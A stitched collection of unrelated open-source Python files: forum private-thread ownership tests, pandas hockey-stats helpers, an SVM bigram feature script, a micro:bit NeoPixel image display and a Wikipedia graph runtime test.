self.assertTrue(UserModel.objects.get(pk=new_owner.pk).sync_unread_private_threads)
self.assertFalse(UserModel.objects.get(pk=self.user.pk).sync_unread_private_threads)
self.assertTrue(UserModel.objects.get(pk=self.other_user.pk).sync_unread_private_threads)
# ownership was transferred
self.assertEqual(self.thread.participants.count(), 3)
self.assertTrue(ThreadParticipant.objects.get(user=new_owner).is_owner)
self.assertFalse(ThreadParticipant.objects.get(user=self.user).is_owner)
self.assertFalse(ThreadParticipant.objects.get(user=self.other_user).is_owner)
# change was recorded in event
event = self.thread.post_set.order_by('id').last()
self.assertTrue(event.is_event)
self.assertEqual(event.event_type, 'changed_owner')
def test_moderator_takeover(self):
"""moderator can takeover the thread"""
ThreadParticipant.objects.set_owner(self.thread, self.other_user)
ThreadParticipant.objects.add_participants(self.thread, [self.user])
override_acl(self.user, {'can_moderate_private_threads': 1})
response = self.patch(
self.api_link, [
{
'op': 'replace',
'path': 'owner',
'value': self.user.pk,
},
]
)
self.assertEqual(response.status_code, 200)
# valid users were flagged for sync
self.assertFalse(UserModel.objects.get(pk=self.user.pk).sync_unread_private_threads)
self.assertTrue(UserModel.objects.get(pk=self.other_user.pk).sync_unread_private_threads)
# ownership was transferred
self.assertEqual(self.thread.participants.count(), 2)
self.assertTrue(ThreadParticipant.objects.get(user=self.user).is_owner)
self.assertFalse(ThreadParticipant.objects.get(user=self.other_user).is_owner)
# change was recorded in event
event = self.thread.post_set.order_by('id').last()
self.assertTrue(event.is_event)
self.assertTrue(event.event_type, 'tookover')
def test_moderator_closed_thread_takeover(self):
"""moderator can takeover closed thread thread"""
ThreadParticipant.objects.set_owner(self.thread, self.other_user)
ThreadParticipant.objects.add_participants(self.thread, [self.user])
self.thread.is_closed = True
self.thread.save()
override_acl(self.user, {'can_moderate_private_threads': 1})
response = self.patch(
self.api_link, [
{
'op': 'replace',
'path': 'owner',
'value': self.user.pk,
},
]
)
self.assertEqual(response.status_code, 200)
# valid users were flagged for sync
self.assertFalse(UserModel.objects.get(pk=self.user.pk).sync_unread_private_threads)
self.assertTrue(UserModel.objects.get(pk=self.other_user.pk).sync_unread_private_threads)
# ownership was transfered
self.assertEqual(self.thread.participants.count(), 2)
self.assertTrue(ThreadParticipant.objects.get(user=self.user).is_owner)
self.assertFalse(ThreadParticipant.objects.get(user=self.other_user).is_owner)
# change was recorded in event
event = self.thread.post_set.order_by('id').last()
self.assertTrue(event.is_event)
self.assertTrue(event.event_type, 'tookover')

# --- vega/networks/tensorflow/customs/edvr/__init__.py (repo: jie311/vega, license: MIT) ---
from .edvr import EDVR

# --- ruledxml/tests/data/003_rules.py (repo: meisterluk/ruledxml, license: BSD-3-Clause) ---
from ruledxml import destination
@destination("/root/nested/child@attr")
def ruleNestedElement():
    return 3.5

# --- visdialch/utils/__init__.py (repo: xiaoxiaoheimei/SeqDialN, license: BSD-3-Clause) ---
from .dynamic_rnn import DynamicRNN  # noqa: F401
from .dynamic_rnn_v2 import DynamicRNN_v2

# --- WEEKS/CD_Sata-Structures/_RESOURCES/python-prac/mini-scripts/Python_Strings.txt.py (repo: webdevhub42/Lambda, license: MIT) ---
# You can use double or single quotes:
print("Hello")
print('Hello')

# --- src/masonite/contracts/managers/BroadcastManagerContract.py (repo: Abeautifulsnow/masonite, license: MIT) ---
from abc import ABC


class BroadcastManagerContract(ABC):
    pass

# --- plugin/src/test/resources/optimizeImports/order.after.py (repo: consulo/consulo-python, license: Apache-2.0) ---
import sys
import datetime
import foo
from bar import *
sys.path
datetime.datetime

# --- mass/simulation/__init__.py (repo: SBRG/MASSpy, license: MIT) ---
# -*- coding: utf-8 -*-
from mass.simulation.ensemble import generate_ensemble_of_models
from mass.simulation.simulation import Simulation
__all__ = ()

# --- notebooks/project_functions1.py (repo: data301-2021-winter1/project-group23-project, license: MIT) ---
import pandas as pd
import seaborn as sns
import numpy as np


# Loading the csv file and dropping the unwanted columns.
def load_and_process(path_to_csv_file):
    data = (pd.read_csv(path_to_csv_file)
            .drop(columns=['CF', 'CA', 'SCF', 'SCA', 'TOI', 'Unnamed: 2'])
            )
    return data


# Dropping all of the teams I don't want and just getting the Vancouver Canucks, resetting the index, collecting the correct games (10 before Covid-19 outbreak).
def Canucks_Before_Data(data):
    data1 = (data.drop(data[data.Team.isin(["Arizona Coyotes", "Buffalo Sabres", "Boston Bruins", "Carolina Hurricanes", "Columbus Blue Jackets", "Calgary Flames", "Chicago Blackhawks", "Colorado Avalanche", "Dallas Stars", "Detroit Red Wings", "Florida Panthers", "Los Angeles Kings", "Minnesota Wild", "Nashville Predators", "Pittsburgh Penguins", "San Jose Sharks", "Tampa Bay Lightning", "St Louis Blues", "Vegas Golden Knights", "Edmonton Oilers", "Montreal Canadiens", "New Jersey Devils", "New York Islanders", "New York Rangers", "Ottawa Senators", "Philadelphia Flyers", "Toronto Maple Leafs", "Winnipeg Jets", "Washington Capitals", "Anaheim Ducks"])].index)
             .reset_index()
             .drop(data.index[0:27]).drop(data.index[47:56])
             .reset_index().drop(columns="index")
             .drop(columns=['level_0'])
             .drop(data.index[10:20])
             .reset_index()
             .rename(columns={'CF%': "CF% Before", 'SCF%': "SCF% Before", 'SH%': "SH% Before", 'SV%': "SV% Before", 'PDO': "PDO Before"}).drop(columns="Team")
             )
    return data1


# Dropping all of the teams I don't want and just getting the Vancouver Canucks, resetting the index, collecting the correct games (10 after Covid-19 outbreak).
def Canucks_After_Data(data):
    data2 = (data.drop(data[data.Team.isin(["Arizona Coyotes", "Buffalo Sabres", "Boston Bruins", "Carolina Hurricanes", "Columbus Blue Jackets", "Calgary Flames", "Chicago Blackhawks", "Colorado Avalanche", "Dallas Stars", "Detroit Red Wings", "Florida Panthers", "Los Angeles Kings", "Minnesota Wild", "Nashville Predators", "Pittsburgh Penguins", "San Jose Sharks", "Tampa Bay Lightning", "St Louis Blues", "Vegas Golden Knights", "Edmonton Oilers", "Montreal Canadiens", "New Jersey Devils", "New York Islanders", "New York Rangers", "Ottawa Senators", "Philadelphia Flyers", "Toronto Maple Leafs", "Winnipeg Jets", "Washington Capitals", "Anaheim Ducks"])].index)
             .reset_index()
             .drop(data.index[0:27]).drop(data.index[47:56])
             .reset_index().drop(columns="index")
             .drop(columns=['level_0'])
             .drop(data.index[0:10]).drop(data.index[20:20])
             .reset_index()
             .rename(columns={'CF%': "CF% After", 'SCF%': "SCF% After", 'SH%': "SH% After", 'SV%': "SV% After", 'PDO': "PDO After"}).drop(columns="Team")
             )
    return data2


# Dropping all of the teams I don't want and just getting the Buffalo Sabres, resetting the index, collecting the correct games (10 before Covid-19 outbreak).
def Sabres_Before_Data(data):
    data3 = (data.drop(data[data.Team.isin(["Arizona Coyotes", "Vancouver Canucks", "Boston Bruins", "Carolina Hurricanes", "Columbus Blue Jackets", "Calgary Flames", "Chicago Blackhawks", "Colorado Avalanche", "Dallas Stars", "Detroit Red Wings", "Florida Panthers", "Los Angeles Kings", "Minnesota Wild", "Nashville Predators", "Pittsburgh Penguins", "San Jose Sharks", "Tampa Bay Lightning", "St Louis Blues", "Vegas Golden Knights", "Edmonton Oilers", "Montreal Canadiens", "New Jersey Devils", "New York Islanders", "New York Rangers", "Ottawa Senators", "Philadelphia Flyers", "Toronto Maple Leafs", "Winnipeg Jets", "Washington Capitals", "Anaheim Ducks"])].index)
             .reset_index()
             .drop(data.index[20:56])
             .drop(data.index[10:20])
             .drop(columns="index")
             .reset_index()
             .rename(columns={'CF%': "CF% Before", 'SCF%': "SCF% Before", 'SH%': "SH% Before", 'SV%': "SV% Before", 'PDO': "PDO Before"}).drop(columns="Team")
             )
    return data3


# Dropping all of the teams I don't want and just getting the Buffalo Sabres, resetting the index, collecting the correct games (10 after Covid-19 outbreak).
def Sabres_After_Data(data):
    data4 = (data.drop(data[data.Team.isin(["Arizona Coyotes", "Vancouver Canucks", "Boston Bruins", "Carolina Hurricanes", "Columbus Blue Jackets", "Calgary Flames", "Chicago Blackhawks", "Colorado Avalanche", "Dallas Stars", "Detroit Red Wings", "Florida Panthers", "Los Angeles Kings", "Minnesota Wild", "Nashville Predators", "Pittsburgh Penguins", "San Jose Sharks", "Tampa Bay Lightning", "St Louis Blues", "Vegas Golden Knights", "Edmonton Oilers", "Montreal Canadiens", "New Jersey Devils", "New York Islanders", "New York Rangers", "Ottawa Senators", "Philadelphia Flyers", "Toronto Maple Leafs", "Winnipeg Jets", "Washington Capitals", "Anaheim Ducks"])].index)
             .reset_index()
             .drop(data.index[0:10])
             .drop(data.index[20:56])
             .drop(columns="index")
             .reset_index()
             .rename(columns={'CF%': "CF% After", 'SCF%': "SCF% After", 'SH%': "SH% After", 'SV%': "SV% After", 'PDO': "PDO After"}).drop(columns="Team")
             )
    return data4


# Canucks Combined Function
def Canucks_Before_And_After(data):
    data1 = (data.drop(data[data.Team.isin(["Arizona Coyotes", "Buffalo Sabres", "Boston Bruins", "Carolina Hurricanes", "Columbus Blue Jackets", "Calgary Flames", "Chicago Blackhawks", "Colorado Avalanche", "Dallas Stars", "Detroit Red Wings", "Florida Panthers", "Los Angeles Kings", "Minnesota Wild", "Nashville Predators", "Pittsburgh Penguins", "San Jose Sharks", "Tampa Bay Lightning", "St Louis Blues", "Vegas Golden Knights", "Edmonton Oilers", "Montreal Canadiens", "New Jersey Devils", "New York Islanders", "New York Rangers", "Ottawa Senators", "Philadelphia Flyers", "Toronto Maple Leafs", "Winnipeg Jets", "Washington Capitals", "Anaheim Ducks"])].index)
             .reset_index()
             .drop(data.index[0:27]).drop(data.index[47:56])
             .reset_index().drop(columns="index")
             .drop(columns=['level_0'])
             .drop(data.index[10:20])
             .reset_index()
             .rename(columns={'CF%': "CF% Before", 'SCF%': "SCF% Before", 'SH%': "SH% Before", 'SV%': "SV% Before", 'PDO': "PDO Before"}).drop(columns="Team")
             .drop(columns=["index"])
             )
    data2 = (data.drop(data[data.Team.isin(["Arizona Coyotes", "Buffalo Sabres", "Boston Bruins", "Carolina Hurricanes", "Columbus Blue Jackets", "Calgary Flames", "Chicago Blackhawks", "Colorado Avalanche", "Dallas Stars", "Detroit Red Wings", "Florida Panthers", "Los Angeles Kings", "Minnesota Wild", "Nashville Predators", "Pittsburgh Penguins", "San Jose Sharks", "Tampa Bay Lightning", "St Louis Blues", "Vegas Golden Knights", "Edmonton Oilers", "Montreal Canadiens", "New Jersey Devils", "New York Islanders", "New York Rangers", "Ottawa Senators", "Philadelphia Flyers", "Toronto Maple Leafs", "Winnipeg Jets", "Washington Capitals", "Anaheim Ducks"])].index)
             .reset_index()
             .drop(data.index[0:27]).drop(data.index[47:56])
             .reset_index().drop(columns="index")
             .drop(columns=['level_0'])
             .drop(data.index[0:10]).drop(data.index[20:20])
             .reset_index()
             .rename(columns={'CF%': "CF% After", 'SCF%': "SCF% After", 'SH%': "SH% After", 'SV%': "SV% After", 'PDO': "PDO After"}).drop(columns="Team")
             .drop(columns=["index"])
             )
    DataCanucksBandA = pd.concat([data1, data2], axis=1)
    return DataCanucksBandA


# Sabres Combined Function
def Sabres_Before_After(data):
    data3 = (data.drop(data[data.Team.isin(["Arizona Coyotes", "Vancouver Canucks", "Boston Bruins", "Carolina Hurricanes", "Columbus Blue Jackets", "Calgary Flames", "Chicago Blackhawks", "Colorado Avalanche", "Dallas Stars", "Detroit Red Wings", "Florida Panthers", "Los Angeles Kings", "Minnesota Wild", "Nashville Predators", "Pittsburgh Penguins", "San Jose Sharks", "Tampa Bay Lightning", "St Louis Blues", "Vegas Golden Knights", "Edmonton Oilers", "Montreal Canadiens", "New Jersey Devils", "New York Islanders", "New York Rangers", "Ottawa Senators", "Philadelphia Flyers", "Toronto Maple Leafs", "Winnipeg Jets", "Washington Capitals", "Anaheim Ducks"])].index)
             .reset_index()
             .drop(data.index[20:56])
             .drop(data.index[10:20])
             .drop(columns="index")
             .reset_index()
             .rename(columns={'CF%': "CF% Before", 'SCF%': "SCF% Before", 'SH%': "SH% Before", 'SV%': "SV% Before", 'PDO': "PDO Before"}).drop(columns="Team")
             .drop(columns=["index"])
             )
    data4 = (data.drop(data[data.Team.isin(["Arizona Coyotes", "Vancouver Canucks", "Boston Bruins", "Carolina Hurricanes", "Columbus Blue Jackets", "Calgary Flames", "Chicago Blackhawks", "Colorado Avalanche", "Dallas Stars", "Detroit Red Wings", "Florida Panthers", "Los Angeles Kings", "Minnesota Wild", "Nashville Predators", "Pittsburgh Penguins", "San Jose Sharks", "Tampa Bay Lightning", "St Louis Blues", "Vegas Golden Knights", "Edmonton Oilers", "Montreal Canadiens", "New Jersey Devils", "New York Islanders", "New York Rangers", "Ottawa Senators", "Philadelphia Flyers", "Toronto Maple Leafs", "Winnipeg Jets", "Washington Capitals", "Anaheim Ducks"])].index)
             .reset_index()
             .drop(data.index[0:10])
             .drop(data.index[20:56])
             .drop(columns="index")
             .reset_index()
             .rename(columns={'CF%': "CF% After", 'SCF%': "SCF% After", 'SH%': "SH% After", 'SV%': "SV% After", 'PDO': "PDO After"}).drop(columns="Team")
             .drop(columns=["index"])
             )
    DataSabresBandA = pd.concat([data3, data4], axis=1)
    return DataSabresBandA


# A function to show the statistics of selected variables for the top four functions.
def Describe(data):
    return data.describe().T

# --- Utilities/VTKPythonWrapping/paraview/vtk/widgets.py (repo: cjh1/ParaView, license: BSD-3-Clause) ---
from vtkWidgetsPython import *

# --- scripts/svm/union.py (repo: AdLucem/infotabs-code, license: Apache-2.0) ---
import pandas as pd
import numpy as np
from numpy import linalg as LA

data_dir = "./../../temp/data/parapremise/"
save_dir = "./../../temp/svmformat/union"


def get_dimensions(train_data, dev_data, test_data, test_adverse_data, alpha3_data):
    bigram_to_index = {}
    index_to_bigram = []
    for index, row in train_data.iterrows():
        # label = int(row["label"])
        try:
            if row["hypothesis"][-1] == '.':
                row["hypothesis"] = row["hypothesis"][:-1]
        except:
            print(index)
            print(row["hypothesis"])
            continue
        unigrams = row["hypothesis"].split(" ")[:-1]
        bigrams = [b for b in zip(row["hypothesis"].split(" ")[:-1], row["hypothesis"].split(" ")[1:])]
        bigrams += unigrams
        bigrams = set(bigrams)
        try:
            unigrams_premise = row["premise"].split(" ")[:-1]
            bigrams_premise = [b for b in zip(row["premise"].split(" ")[:-1], row["premise"].split(" ")[1:])]
            bigrams_premise += unigrams_premise
            bigrams_premise = set(bigrams_premise)
        except:
            bigrams_premise = bigrams
        bigrams_union = list(bigrams.union(bigrams_premise))
        for b in bigrams_union:
            key = " ".join(b)
            if key not in bigram_to_index.keys():
                bigram_to_index[key] = len(index_to_bigram)
                index_to_bigram.append(key)
        if (index + 1) % 1000 == 0:
            print("{} examples finished".format(index + 1))
    for index, row in dev_data.iterrows():
        # label = int(row["label"])
        if row["hypothesis"][-1] == '.':
            row["hypothesis"] = row["hypothesis"][:-1]
        unigrams = row["hypothesis"].split(" ")[:-1]
        bigrams = [b for b in zip(row["hypothesis"].split(" ")[:-1], row["hypothesis"].split(" ")[1:])]
        bigrams += unigrams
        bigrams = set(bigrams)
        try:
            unigrams_premise = row["premise"].split(" ")[:-1]
            bigrams_premise = [b for b in zip(row["premise"].split(" ")[:-1], row["premise"].split(" ")[1:])]
            bigrams_premise += unigrams_premise
            bigrams_premise = set(bigrams_premise)
        except:
            bigrams_premise = bigrams
        bigrams_union = list(bigrams.union(bigrams_premise))
        for b in bigrams_union:
            key = " ".join(b)
            if key not in bigram_to_index.keys():
                bigram_to_index[key] = len(index_to_bigram)
                index_to_bigram.append(key)
        if (index + 1) % 1000 == 0:
            print("{} examples finished".format(index + 1))
    for index, row in test_data.iterrows():
        # label = int(row["label"])
        if row["hypothesis"][-1] == '.':
            row["hypothesis"] = row["hypothesis"][:-1]
        unigrams = row["hypothesis"].split(" ")[:-1]
        bigrams = [b for b in zip(row["hypothesis"].split(" ")[:-1], row["hypothesis"].split(" ")[1:])]
        bigrams += unigrams
        bigrams = set(bigrams)
        try:
            unigrams_premise = row["premise"].split(" ")[:-1]
            bigrams_premise = [b for b in zip(row["premise"].split(" ")[:-1], row["premise"].split(" ")[1:])]
            bigrams_premise += unigrams_premise
            bigrams_premise = set(bigrams_premise)
        except:
            bigrams_premise = bigrams
        bigrams_union = list(bigrams.union(bigrams_premise))
        for b in bigrams_union:
            key = " ".join(b)
            if key not in bigram_to_index.keys():
                bigram_to_index[key] = len(index_to_bigram)
                index_to_bigram.append(key)
        if (index + 1) % 1000 == 0:
            print("{} examples finished".format(index + 1))
    for index, row in test_adverse_data.iterrows():
        # label = int(row["label"])
        if row["hypothesis"][-1] == '.':
            row["hypothesis"] = row["hypothesis"][:-1]
        unigrams = row["hypothesis"].split(" ")[:-1]
        bigrams = [b for b in zip(row["hypothesis"].split(" ")[:-1], row["hypothesis"].split(" ")[1:])]
        bigrams += unigrams
        bigrams = set(bigrams)
        unigrams_premise = row["premise"].split(" ")[:-1]
        bigrams_premise = [b for b in zip(row["premise"].split(" ")[:-1], row["premise"].split(" ")[1:])]
        bigrams_premise += unigrams_premise
        bigrams_premise = set(bigrams_premise)
        bigrams_union = list(bigrams.union(bigrams_premise))
        for b in bigrams_union:
            key = " ".join(b)
            if key not in bigram_to_index.keys():
                bigram_to_index[key] = len(index_to_bigram)
                index_to_bigram.append(key)
        if (index + 1) % 1000 == 0:
            print("{} examples finished".format(index + 1))
    for index, row in alpha3_data.iterrows():
        # label = int(row["label"])
        if row["hypothesis"][-1] == '.':
            row["hypothesis"] = row["hypothesis"][:-1]
        unigrams = row["hypothesis"].split(" ")[:-1]
        bigrams = [b for b in zip(row["hypothesis"].split(" ")[:-1], row["hypothesis"].split(" ")[1:])]
        bigrams += unigrams
        bigrams = set(bigrams)
        try:
            unigrams_premise = row["premise"].split(" ")[:-1]
            bigrams_premise = [b for b in zip(row["premise"].split(" ")[:-1], row["premise"].split(" ")[1:])]
            bigrams_premise += unigrams_premise
            bigrams_premise = set(bigrams_premise)
        except:
            bigrams_premise = bigrams
        bigrams_union = list(bigrams.union(bigrams_premise))
        for b in bigrams_union:
            key = " ".join(b)
            if key not in bigram_to_index.keys():
                bigram_to_index[key] = len(index_to_bigram)
                index_to_bigram.append(key)
        if (index + 1) % 1000 == 0:
            print("{} examples finished".format(index + 1))
    return bigram_to_index, index_to_bigram


def get_data(data, bigram_to_index):
    trainable_data = np.zeros((1, len(bigram_to_index)))
    labels = np.array([])
    for index, row in data.iterrows():
        labels = np.append(labels, int(row["label"]))
        data_point = np.zeros((1, len(bigram_to_index)))
        if row["hypothesis"][-1] == '.':
            row["hypothesis"] = row["hypothesis"][:-1]
        unigrams = row["hypothesis"].split(" ")[:-1]
        bigrams = [b for b in zip(row["hypothesis"].split(" ")[:-1], row["hypothesis"].split(" ")[1:])]
        bigrams += unigrams
        for b in bigrams:
            key = " ".join(b)
            data_point[0][bigram_to_index[key]] = 1
        trainable_data = np.append(trainable_data, data_point, axis=0)
        if (index + 1) % 1000 == 0:
            print("{} examples finished".format(index))
    trainable_data = trainable_data[1:]
    return trainable_data, labels


def get_data_svm_format(data, bigram_to_index):
    trainable_data = ""
    for index, row in data.iterrows():
        data_point = str(int(row["label"]) + 1) + " "
        try:
            if row["hypothesis"][-1] == '.':
                row["hypothesis"] = row["hypothesis"][:-1]
        except:
            print(index)
            print(row["hypothesis"])
            continue
        unigrams = row["hypothesis"].split(" ")[:-1]
        bigrams = [b for b in zip(row["hypothesis"].split(" ")[:-1], row["hypothesis"].split(" ")[1:])]
        bigrams += unigrams
        bigrams = set(bigrams)
        try:
            unigrams_premise = row["premise"].split(" ")[:-1]
            bigrams_premise = [b for b in zip(row["premise"].split(" ")[:-1], row["premise"].split(" ")[1:])]
            bigrams_premise += unigrams_premise
            bigrams_premise = set(bigrams_premise)
        except:
            bigrams_premise = bigrams
        bigrams_union = list(bigrams.union(bigrams_premise))
        bigram_active = []
        for b in bigrams_union:
            key = " ".join(b)
            bigram_active += [int(bigram_to_index[key]) + 1]
        bigram_active = list(set(bigram_active))
        bigram_active.sort()
        for b in bigram_active[:-1]:
            data_point += str(b) + ":" + "1" + " "
        try:
            trainable_data += data_point + str(bigram_active[-1] + 1) + ":" + "1" + "\n"
        except:
            pass
        if (index + 1) % 1000 == 0:
            print("{} examples finished".format(index))
    return trainable_data


if __name__ == "__main__":
    train_data = pd.read_csv(data_dir + "train.tsv", sep="\t", encoding="ISO-8859-1")
    dev_data = pd.read_csv(data_dir + "dev.tsv", sep="\t", encoding="ISO-8859-1")
    test_data = pd.read_csv(data_dir + "test_alpha1.tsv", sep="\t", encoding="ISO-8859-1")
    test_adverse_data = pd.read_csv(data_dir + "test_alpha2.tsv", sep="\t", encoding="ISO-8859-1")
    alpha3_data = pd.read_csv(data_dir + "test_alpha3.tsv", sep="\t", encoding="ISO-8859-1")

    bigram_to_index, index_to_bigram = get_dimensions(train_data, dev_data, test_data, test_adverse_data, alpha3_data)
    print("Got_dimensions")
    # np.save("lookup.npy", np.array(index_to_bigram))

    train_data_final = get_data_svm_format(train_data, bigram_to_index)
    fp = open(save_dir + "train.txt", "w+")
    fp.write(train_data_final)

    dev_data_final = get_data_svm_format(dev_data, bigram_to_index)
    fp = open(save_dir + "dev.txt", "w+")
    fp.write(dev_data_final)

    test_data_final = get_data_svm_format(test_data, bigram_to_index)
    fp = open(save_dir + "test_alpha1.txt", "w+")
    fp.write(test_data_final)

    test_data_adverse_final = get_data_svm_format(test_adverse_data, bigram_to_index)
    fp = open(save_dir + "test_alpha2.txt", "w+")
    fp.write(test_data_adverse_final)

    alpha3_data_final = get_data_svm_format(alpha3_data, bigram_to_index)
    fp = open(save_dir + "test_alpha3.txt", "w+")
    fp.write(alpha3_data_final)

# --- holobot/sdk/threading/__init__.py (repo: rexor12/holobot, license: MIT) ---
from .async_loop import AsyncLoop

# --- neopixel/neo_16x16_img/neo16x16_img.py (repo: randmor/microbit-lib, license: MIT) ---
from microbit import *
from neopixel import NeoPixel


class neo16x16_img:
    def __init__(self, pin):
        # 16x16 matrix driven as a 256-LED NeoPixel strip
        self.np = NeoPixel(pin, 256)

    def clear(self):
        self.np.clear()

    def show(self, dat, pos=0):
        # Render image data starting pos columns into dat; each 24-bit
        # entry packs two pixels at 4 bits per colour channel, and the
        # parity of pos selects the pixel order within each 16-LED column.
        for x in range(16):
            for y in range(8):
                if ((x + pos) * 8) >= len(dat):
                    # past the end of the data: blank both pixels
                    self.np[x * 16 + y * 2] = (0, 0, 0)
                    self.np[x * 16 + y * 2 + 1] = (0, 0, 0)
                else:
                    t = dat[(x + pos) * 8 + y]
                    # low 12 bits: first pixel
                    r = t % 16
                    g = (t >> 4) % 16
                    b = (t >> 8) % 16
                    if pos % 2:
                        self.np[x * 16 + y * 2] = (r, g, b)
                    else:
                        self.np[x * 16 + 15 - y * 2] = (r, g, b)
                    # high 12 bits: second pixel
                    r = (t >> 12) % 16
                    g = (t >> 16) % 16
                    b = (t >> 20) % 16
                    if pos % 2:
                        self.np[x * 16 + y * 2 + 1] = (r, g, b)
                    else:
                        self.np[x * 16 + 14 - y * 2] = (r, g, b)
        self.np.show()


def _delay(t):
    # crude busy-wait delay
    while t > 0:
        t = t - 1
npdat=[
0x000000, 0x000000, 0x000000, 0x000000,
0x121145, 0x000000, 0x000000, 0x000000,
0x000000, 0x000000, 0x000000, 0x169156,
0x000000, 0x000000, 0x000000, 0x000000,
0x000000, 0x000000, 0x000000, 0x234000,
0x15818B, 0x000217, 0x000000, 0x000000,
0x000000, 0x000000, 0x129000, 0x0AE17B,
0x000169, 0x000000, 0x000000, 0x000000,
0x000000, 0x000000, 0x000000, 0x19C301,
0x24709C, 0x00013A, 0x000000, 0x000000,
0x000000, 0x000000, 0x116000, 0x169237,
0x24718B, 0x245169, 0x000000, 0x000000,
0x000000, 0x235000, 0x0CF09D, 0x1590AE,
0x159159, 0x000000, 0x000000, 0x000000,
0x000000, 0x000000, 0x000000, 0x17C149,
0x09D18C, 0x0BF0BE, 0x23519C, 0x000234,
0x000000, 0x17B000, 0x16B15C, 0x14817C,
0x000024, 0x000000, 0x000000, 0x000000,
0x000000, 0x000000, 0x000000, 0x002013,
0x012000, 0x11A126, 0x000116, 0x000000,
0x000000, 0x000000, 0x000000, 0x048012,
0x16B149, 0x12716A, 0x000000, 0x000000,
0x000000, 0x12811B, 0x147247, 0x09E16A,
0x15B09D, 0x00010A, 0x000000, 0x000000,
0x000000, 0x000000, 0x16C127, 0x0BE08D,
0x17A0BF, 0x18B09C, 0x13A17A, 0x000227,
0x214000, 0x0AE17A, 0x1680AE, 0x0AD235,
0x0BE0BF, 0x00009C, 0x000000, 0x000000,
0x000000, 0x000000, 0x236235, 0x158246,
0x000245, 0x246312, 0x18B168, 0x200145,
0x122000, 0x000123, 0x000000, 0x000000,
0x000000, 0x235000, 0x000000, 0x000000,
0x000000, 0x000000, 0x000000, 0x000000,
0x000000, 0x000000, 0x000000, 0x000000,
0x000000, 0x000000, 0xEEE000, 0xFC9FC9,
0xFC9FC9, 0x000000, 0x000000, 0x000000,
0x000000, 0x000000, 0xFC9000, 0xFC9FC9,
0xFC9FC9, 0xEEEFC9, 0x000000, 0x000000,
0x000000, 0xAAA000, 0x555FC9, 0x000000,
0x333000, 0xEEEFC9, 0x000000, 0x000000,
0x000000, 0x000000, 0xFC9FC9, 0x000000,
0x000F90, 0xFC9000, 0x000FC9, 0x000000,
0x000000, 0xFC9000, 0x000FC9, 0xF99000,
0x000000, 0xFC9FC9, 0x000000, 0x000000,
0x000000, 0x000000, 0xFC9FC9, 0x000000,
0x000000, 0xFC9000, 0x000FC9, 0x000000,
0x000000, 0xFC9000, 0x000FC9, 0x000000,
0x000000, 0xFC9FC9, 0x000000, 0x000000,
0x000000, 0x000000, 0xFC9FC9, 0x000000,
0x000000, 0xFC9000, 0x000FC9, 0x000000,
0x000000, 0xFC9000, 0x000FC9, 0x000000,
0x000000, 0xFC9FC9, 0x000000, 0x000000,
0x000000, 0x000000, 0xFC9FC9, 0x000000,
0x000000, 0xFC9000, 0x000FC9, 0x000000,
0x000000, 0xFC9000, 0x000FC9, 0xF99000,
0x000000, 0xFC9FC9, 0x000000, 0x000000,
0x000000, 0x000000, 0xFC9FC9, 0x000000,
0x000F90, 0xFC9000, 0x000FC9, 0x000000,
0x000000, 0xBBB000, 0x333FC9, 0x000000,
0x111000, 0xEEEFC9, 0x000000, 0x000000,
0x000000, 0x000000, 0xFC9000, 0xFC9FC9,
0xFC9FC9, 0xFC9FC9, 0x000000, 0x000000,
0x000000, 0x000000, 0xFC9000, 0xFC9FC9,
0xFC9FC9, 0x000000, 0x000000, 0x000000,
]
ne = neo16x16_img(pin1)
n = 0
while True:
ne.show(npdat, n)
n = (n+16)%32
_delay(15000)
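The packing that `show()` decodes can be sketched host-side. The `unpack` helper below is illustrative (not part of the class); it reads the same bit layout: two pixels per 24-bit word, 4 bits per color channel.

```python
def unpack(word):
    # Low 12 bits -> first pixel (r = bits 0-3, g = 4-7, b = 8-11);
    # high 12 bits -> second pixel (r = 12-15, g = 16-19, b = 20-23).
    first = (word % 16, (word >> 4) % 16, (word >> 8) % 16)
    second = ((word >> 12) % 16, (word >> 16) % 16, (word >> 20) % 16)
    return first, second

print(unpack(0xFC9ABC))  # -> ((12, 11, 10), (9, 12, 15))
```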
| 33.794643 | 52 | 0.653897 | 430 | 3,785 | 5.737209 | 0.283721 | 0.648561 | 0.632347 | 0.518849 | 0.522092 | 0.501824 | 0.406567 | 0.310499 | 0.297527 | 0.297527 | 0 | 0.572114 | 0.228798 | 3,785 | 111 | 53 | 34.099099 | 0.273039 | 0 | 0 | 0.304762 | 0 | 0 | 0 | 0 | 0 | 0 | 0.541083 | 0 | 0 | 1 | 0.038095 | false | 0 | 0.019048 | 0 | 0.066667 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d7664d6606be6452da89bc1bbf9ddda941f6b4d5 | 1,048 | py | Python | back/tests/runtimes.py | ubbonolte/linkmaps | 0f077f1d99ea3d1ea8cf672569a80899e1210203 | [
"MIT"
] | null | null | null | back/tests/runtimes.py | ubbonolte/linkmaps | 0f077f1d99ea3d1ea8cf672569a80899e1210203 | [
"MIT"
] | null | null | null | back/tests/runtimes.py | ubbonolte/linkmaps | 0f077f1d99ea3d1ea8cf672569a80899e1210203 | [
"MIT"
] | null | null | null | from graph_service import WikiGraphGenerator
import timeit
def run_wiki_generator():
    generator = WikiGraphGenerator()
    # Time graph generation for a niche and a popular article, at depths 1 and 2.
    for title in ('Cook_(domestic_worker)', 'Albert Einstein'):
        for depth in (1, 2):
            start = timeit.default_timer()
            graph = generator.generate(title, depth=depth)
            stop = timeit.default_timer()
            print(f"{title}, Depth == {depth}: Runtime = ", stop - start, "s, Graph = ", graph)
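The start/stop timing pattern used above can also be wrapped in a small context manager to cut repetition. This is an illustrative sketch, independent of `WikiGraphGenerator`:

```python
import timeit
from contextlib import contextmanager

@contextmanager
def timed(label):
    # Measure wall-clock time around the body of the with-block.
    start = timeit.default_timer()
    yield
    print(label, "Runtime =", timeit.default_timer() - start, "s")

with timed("sum of range(1000):"):
    sum(range(1000))
```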
